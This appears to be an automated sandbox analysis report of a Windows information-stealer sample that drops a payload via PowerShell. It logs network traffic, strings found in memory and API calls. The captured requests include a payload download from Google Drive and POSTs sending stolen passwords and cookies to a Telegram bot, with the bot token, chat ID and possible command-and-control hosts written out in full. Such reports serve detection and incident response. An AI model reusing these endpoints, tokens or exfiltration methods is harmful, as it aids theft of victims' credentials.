            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3278838ce892Host: api.telegram.orgContent-Length: 582
            Source: global trafficHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3298cde51afdHost: api.telegram.orgContent-Length: 1279
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49937 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49960 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49905 -> 142.250.185.174:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49955 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49969 -> 104.21.96.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49947 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3278838ce892Host: api.telegram.orgContent-Length: 582
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 18:17:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: fGu8xWoMrg.exe, Mangedoblende.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2519984504.000000000852C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBeq
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/&)
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/n)D20
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3335288080.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzqT
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.000000000351E000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2604018957.0000000003519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.000000000351E000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3334889586.000000000350D000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2604018957.0000000003519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F45C000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F417000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F45C000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Mangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F592000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F58D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBeq
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.5:49905 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.161:443 -> 192.168.2.5:49916 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49997 version: TLS 1.2
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeJump to dropped file
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034F7
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_00406BFE0_2_00406BFE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0764BE0E2_2_0764BE0E
